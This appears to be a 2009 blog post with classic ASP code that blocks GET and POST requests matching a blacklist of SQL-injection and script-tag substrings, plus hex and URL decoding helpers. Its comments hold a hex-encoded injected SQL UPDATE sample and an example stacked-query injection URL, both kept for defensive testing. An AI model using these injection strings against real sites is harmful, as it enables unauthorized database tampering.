Tuesday, January 6, 2009

detect Filter All HTTP GET and POST data using a black list

Filter All HTTP GET and POST data using a black list



<%
'str = "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"
'str = "0x3B7570646174652063776E5F6D656D62657220736574206E616D653D2767616E272077686572652069643D"
'str = trim0x( str )
'
'Response.Write decimalToChar( str )
'
'Response.Write "
'====
'"

'Response.Write Request.QueryString() & "
'"
'Response.Write "====
'"
'

'Response.Write Request.ServerVariables("QUERY_STRING") & "<br>=====
'"



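' Black list of substrings that reject the request when they occur in any
' GET or POST value. InStr below runs in text-compare mode (last argument
' 1), so matching is case-insensitive and one spelling per entry suffices.
' The "%20" / "%3C" / "3C736372697074" entries can only match the raw,
' still-encoded query string: values handed back by Request.QueryString and
' Request.Form have already been URL-decoded, which is why the raw
' Request.ServerVariables("QUERY_STRING") is scanned as well (see below).
strBlackList = Array( ";declare", "; declare", ";%20declare", _
    ";set", "; set", ";%20set", _
    ";exec", "; exec", ";%20exec", _
    "%20set", _
    "varchar", _
    "0x44", _
    "<script", _
    "%3Cscript", _
    "3C736372697074", _
    "</script>", _
    "%3C/script", _
    "src=" _
)

' True when strValue contains any entry of strBlackList (case-insensitive).
' The value is copied into a plain string first, exactly as the original
' loop did with queryStr/formStr, so request-collection items compare as
' text. Null or empty values never match.
Function ContainsBlackListed( strValue )
    Dim b, strText
    ContainsBlackListed = False
    strText = strValue
    If IsNull(strText) Then Exit Function
    If Len(strText) = 0 Then Exit Function
    For b = 0 To UBound(strBlackList)
        If InStr(1, strText, strBlackList(b), 1) > 0 Then
            ContainsBlackListed = True
            Exit Function
        End If
    Next
End Function

' Sends the same short reply the original filter sent and stops the page.
' Response.End halts all further processing, so nothing past the filter
' runs for a rejected request.
Sub RejectRequest()
    Response.Write "NO!!"
    Response.End
End Sub

' Scan order:
'  1. the raw query string, because a request of the form
'     post.asp?PageID=123;Declare @a;Set @=123;Exec(@);  is, per the
'     original note, not split into parameters by Request.QueryString, and
'     because the encoded entries in the list can only match here;
'  2. each decoded GET value;
'  3. each decoded POST value.
' Cookies, request headers and the URL path are not inspected. A substring
' black list is a stopgap next to parameterized queries and output
' encoding, not a replacement for them, and legitimate text containing a
' listed word (e.g. "varchar") is rejected too.
' The Execute(...) lines that used to sit, commented out, inside the loops
' are deliberately not restored: they built and ran code from request
' parameter names.
If ContainsBlackListed( Request.ServerVariables("QUERY_STRING") ) Then RejectRequest

For Each item In Request.QueryString()
    If ContainsBlackListed( Request.QueryString(item) ) Then RejectRequest
Next

For Each item In Request.Form()
    If ContainsBlackListed( Request.Form(item) ) Then RejectRequest
Next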



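' Decodes URL-encoded text: "+" becomes a space and every "%XX" (two hex
' digits, either case) becomes Chr(&HXX). Changes from the original:
'  - a "%XX" at the very end of the input is decoded too (the original
'    compared i+2 < Len(str) and silently dropped the "%" there);
'  - a "%" that is not followed by two hex digits is kept literally instead
'    of reaching CLng("&H" & ...) and raising a type-mismatch error;
'  - the caller's variable is left untouched (VBScript passes arguments
'    ByRef by default, and the original assigned to str).
' Each %XX yields one Chr() of that value; multi-byte (UTF-8) sequences
' are not reassembled. Nothing else on this page calls URLDecode.
'
' str    : the encoded text.
' Returns: the decoded text; "" for empty input.
Function URLDecode(str)
    Dim strIn, strOut, pos, ch, pair
    strIn = Replace(str, "+", " ")
    strOut = ""
    pos = 1
    Do While pos <= Len(strIn)
        ch = Mid(strIn, pos, 1)
        ' Mid past the end returns a short string, which IsHexPair rejects.
        pair = Mid(strIn, pos + 1, 2)
        If ch = "%" And URLDecode_IsHexPair(pair) Then
            strOut = strOut & Chr(CLng("&H" & pair))
            pos = pos + 3
        Else
            strOut = strOut & ch
            pos = pos + 1
        End If
    Loop
    URLDecode = strOut
End Function

' True when pair is exactly two hex digits (0-9, A-F, a-f).
Function URLDecode_IsHexPair(pair)
    Dim k
    URLDecode_IsHexPair = False
    If Len(pair) <> 2 Then Exit Function
    For k = 1 To 2
        If InStr(1, "0123456789ABCDEF", UCase(Mid(pair, k, 1)), 0) = 0 Then Exit Function
    Next
    URLDecode_IsHexPair = True
End Function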


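' Returns the hexadecimal character codes of str, two digits per character
' ("AB" -> "4142"), which is the pair layout decimalToChar reads back.
' Hex() alone drops the leading zero for codes below 16 (a tab would
' become "9" and shift every later pair), so short codes are padded to two
' digits; longer codes are kept as Hex() returns them.
' Codes come from Asc, i.e. the server's ANSI code page.
'
' str    : the text to convert.
' Returns: the concatenated hex codes; "" for empty input.
Function charToHex( str )
    Dim pos, hexCode, strResult
    strResult = ""
    For pos = 1 To Len(str)
        hexCode = Hex( Asc( Mid( str, pos, 1 ) ) )
        If Len(hexCode) < 2 Then hexCode = "0" & hexCode
        strResult = strResult & hexCode
    Next
    charToHex = strResult
End Function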

' Returns the decimal character codes of str run together with no
' separator ("AB" -> "6566"). Because nothing delimits the codes the
' output is not reversible in general; it is a display helper only.
' Codes come from Asc, i.e. the server's ANSI code page.
'
' str    : the text to convert.
' Returns: the concatenated decimal codes; "" for empty input.
Function charToDecimal( str )
    Dim pos, total, codes
    codes = ""
    total = Len(str)
    pos = 1
    Do While pos <= total
        codes = codes & CStr( Asc( Mid( str, pos, 1 ) ) )
        pos = pos + 1
    Loop
    charToDecimal = codes
End Function

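' Returns str without a leading "0x" / "0X" marker; any other input comes
' back unchanged. The argument itself is left untouched: VBScript passes
' arguments ByRef by default and the original assigned to str, which
' rewrote the caller's variable as a side effect.
'
' str    : a hex string, optionally prefixed with 0x.
' Returns: the string without the prefix.
Function trim0x(str)
    Dim strValue
    strValue = str
    If LCase(Left(strValue, 2)) = "0x" Then
        strValue = Mid(strValue, 3)
    End If
    trim0x = strValue
End Function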



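' Decodes a string of two-digit hexadecimal pairs into characters
' ("414243" -> "ABC"). Despite the name the input is hex, not decimal:
' each pair goes through hexToDecimal and then Chr. A pair that is not
' two hex digits is skipped; the original passed it on anyway, and since
' hexToDecimal returns 0 for bad input the output silently gained NUL
' characters. A trailing odd digit is ignored, as before. Any "0x" prefix
' must be removed first (see trim0x).
'
' strDec : the hex pairs to decode.
' Returns: the decoded text; "" for empty input.
Function decimalToChar( strDec )
    Dim pos, pair, strResult
    strResult = ""
    ' Upper bound Len-1 leaves a lone trailing digit out of the loop.
    For pos = 1 To Len(strDec) - 1 Step 2
        pair = Mid( strDec, pos, 2 )
        If decimalToChar_IsHexPair( pair ) Then
            strResult = strResult & Chr( hexToDecimal( pair ) )
        End If
    Next
    decimalToChar = strResult
End Function

' True when pair is exactly two characters from 0-9 / A-F (either case).
Function decimalToChar_IsHexPair( pair )
    Dim k
    decimalToChar_IsHexPair = False
    If Len(pair) <> 2 Then Exit Function
    For k = 1 To 2
        If InStr(1, "0123456789ABCDEF", UCase(Mid(pair, k, 1)), 0) = 0 Then Exit Function
    Next
    decimalToChar_IsHexPair = True
End Function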

' Converts a hexadecimal string (either case, no "0x" prefix) to its
' numeric value, e.g. "FF" -> 255. Any character outside 0-9 / A-F makes
' the whole result 0, which is indistinguishable from a genuine "0" or
' "00"; callers that need to tell the two apart must validate first.
' Each digit is weighted with 16 ^ position, so the result is a Double and
' does not overflow a Long for inputs longer than eight digits.
'
' strHex : the hex digits.
' Returns: the numeric value, or 0 for empty or invalid input.
Function hexToDecimal(strHex)
    Dim total, pos, digitValue, numDigits
    numDigits = Len(strHex)
    total = 0
    For pos = 1 To numDigits
        digitValue = InStr("0123456789ABCDEF", UCase(Mid(strHex, pos, 1))) - 1
        If digitValue < 0 Then
            total = 0
            Exit For
        End If
        total = total + digitValue * (16 ^ (numDigits - pos))
    Next
    hexToDecimal = total
End Function
%>
